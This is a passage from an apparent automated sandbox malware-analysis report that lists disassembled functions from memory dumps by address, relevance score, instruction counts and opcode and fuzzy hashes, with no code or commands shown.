                        • Instruction Fuzzy Hash: 7AC2D375E092698FDB68DF58C8917ECB7B1EB48344F1481EAD40EA7391DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483707E0 Relevance: .6, Instructions: 552COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4e453e578a4e559e9c0247ae3d3a7a9ffee7558702e6879e825dd7d940a0b931
                        • Instruction ID: b7dcfde2812bf28398f8bf600c8a7dbe52bd2cefde7efb816428d4cb849b27bb
                        • Opcode Fuzzy Hash: 4e453e578a4e559e9c0247ae3d3a7a9ffee7558702e6879e825dd7d940a0b931
                        • Instruction Fuzzy Hash: 9632E675E192198FDB68DF68C8917ECB7B1EB48344F1481A9E40EA7385DB34AE818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF848371ADA Relevance: .5, Instructions: 521COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d2f8665ad9901dc338b03cf7df1cfcd4318043ed874eed6ff0c3fa7cb1a8ff17
                        • Instruction ID: fc1da616487484161f3c0a431656019514043869d9980b9bb49fc2d23ebba590
                        • Opcode Fuzzy Hash: d2f8665ad9901dc338b03cf7df1cfcd4318043ed874eed6ff0c3fa7cb1a8ff17
                        • Instruction Fuzzy Hash: E702C231B1C90A4FE758EB28C46567D72D2EF88784F688579E40EC73D6CE68AC428745
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483721A3 Relevance: .1, Instructions: 108COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0b079194570dcee26dec96ba5b29e0f89eb24f550ea6fb749f683a3d56b2d77f
                        • Instruction ID: 0dac5400f0bde08fe9989216c943966509d1ff6ddd08e1251e5b7b6f9990da03
                        • Opcode Fuzzy Hash: 0b079194570dcee26dec96ba5b29e0f89eb24f550ea6fb749f683a3d56b2d77f
                        • Instruction Fuzzy Hash: C731463294D2850FD755A7306C138E63FA4EB42368F0941ABE459CB4A3DA1CD697C762
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483721E5 Relevance: .1, Instructions: 95COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cababdc6f34613da81b7978c1c7397cd8aaf2d2d0f5c08c040c83988ee1ff154
                        • Instruction ID: c6cfa5ae550cb06c63ed7c04d7f52b4a6fba1d28978080c4ae8bc30ef679664f
                        • Opcode Fuzzy Hash: cababdc6f34613da81b7978c1c7397cd8aaf2d2d0f5c08c040c83988ee1ff154
                        • Instruction Fuzzy Hash: A821273288E2910FD356A7302C538F63FA4CF42269B0E41E7E499CB8A3D50D9687C362
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483719A0 Relevance: .1, Instructions: 88COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000008.00000002.2347155550.00007FF848370000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848370000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_8_2_7ff848370000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64db149c2e4dc8b9f2eee1d20d824bef0443ef4b86620bbb02adce57e8ee2191
                        • Instruction ID: 5a8f6494c817efb28078ada3c1221af2fdb525249a371eaba60640af17ea9b1e
                        • Opcode Fuzzy Hash: 64db149c2e4dc8b9f2eee1d20d824bef0443ef4b86620bbb02adce57e8ee2191
                        • Instruction Fuzzy Hash: 4E218F32E1994E8FEB84FB6898611FDBBB1FF44354F4440B6C409E32D6DE2858419784
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Executed Functions

                        Function 00007FF848360715 Relevance: 3.7, Strings: 2, Instructions: 1235COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID: N_^$N_^
                        • API String ID: 0-386383641
                        • Opcode ID: 0d2ef27a96c8729b9997d43cd75ac9a8cd3eb597aae3946d30cf525876d2aaaa
                        • Instruction ID: bb5e4599a7b0c29b8d2dc35091b95f834a0244acfef2eed8aa4c2e2be22af816
                        • Opcode Fuzzy Hash: 0d2ef27a96c8729b9997d43cd75ac9a8cd3eb597aae3946d30cf525876d2aaaa
                        • Instruction Fuzzy Hash: 87C2C274E092298FDB68DF58D8A16ECB7B1EB48344F1441EAD44EA7391DB34AE81CF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483607E0 Relevance: .6, Instructions: 552COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 56359824249567881347ca43832221b98c101a9f81b89696cdef2e2fbf9bb5e6
                        • Instruction ID: aa02d35d053bed7219c4c059c3470332885e28d464218c80a958b717d3b1fdd7
                        • Opcode Fuzzy Hash: 56359824249567881347ca43832221b98c101a9f81b89696cdef2e2fbf9bb5e6
                        • Instruction Fuzzy Hash: 2932C574E092198FDB68DF68C8957ECB7B1EF88344F1441A9E50EA7385DB346E818F44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF848361ADA Relevance: .5, Instructions: 525COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a208bc34579f2dada3276104405d34dfbbe1418ddad62ade4177d37af02f8b93
                        • Instruction ID: 4e05d4963ad9c0cf67446a186fe9598dab452a1d71497ca8db251d184eb3c7b3
                        • Opcode Fuzzy Hash: a208bc34579f2dada3276104405d34dfbbe1418ddad62ade4177d37af02f8b93
                        • Instruction Fuzzy Hash: F9028330B1890A4FE768FB2CD46567DB2D2FF88780F584579E00ED72DACE68AC428745
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483621A3 Relevance: .1, Instructions: 107COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 81210b621ed9a912018a778a4ba8fbf1c3dff0f1a926fde0b7218cc16506a48c
                        • Instruction ID: ff934619ea1ecfeed57b387a457d7418390390943a6bcb16009698a8b4cd9e9a
                        • Opcode Fuzzy Hash: 81210b621ed9a912018a778a4ba8fbf1c3dff0f1a926fde0b7218cc16506a48c
                        • Instruction Fuzzy Hash: 7031583198D2850FD765B7346C138E67FA4EB42364F0E01ABE458CB4A3CA1CA687C766
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483621E5 Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f24d0cc4518c2cd6064e1a030d0c338e7592307521aa0637ec8dff6e2db3b70c
                        • Instruction ID: 6300ba60eaa73fe4b1d23693a0ec94dddb1b33d99b3663db304291ca57b86a3a
                        • Opcode Fuzzy Hash: f24d0cc4518c2cd6064e1a030d0c338e7592307521aa0637ec8dff6e2db3b70c
                        • Instruction Fuzzy Hash: DA21363288E2D10FD356A3342C638F27FA4CF42265B0E01EBE098DB4A3C50D6687C766
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF8483619A0 Relevance: .1, Instructions: 87COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000009.00000002.2428740075.00007FF848360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_9_2_7ff848360000_fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7d353d4de20076d3b76816fef750b7bab1ef17adde7313d58abf46a67ee6193a
                        • Instruction ID: cb128b2959b684d5ea49d9f24c8b4c0e742c7a7c4739f0c275031cc5095db10b
                        • Opcode Fuzzy Hash: 7d353d4de20076d3b76816fef750b7bab1ef17adde7313d58abf46a67ee6193a
                        • Instruction Fuzzy Hash: 2B217132E1994A8FEB94FB68D8621FEBBB1FF54250F440076C409F3296DE682C418B84
                        Uniqueness

                        Uniqueness Score: -1.00%